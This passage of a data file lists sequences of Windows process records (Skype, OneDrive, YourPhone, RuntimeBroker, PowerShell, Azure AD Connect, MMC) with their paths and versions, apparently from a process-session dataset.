'Microsoft.Photos'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='msfeedssync', params={'c:/windows/system32/msfeedssync.exe', 'Internet Explorer', '11.00.14393.2007', 'msfeedssync'})\",\"Cmd(name='Explorer', params={'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/explorer.exe', '10.0.14393.0', 'Explorer'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', 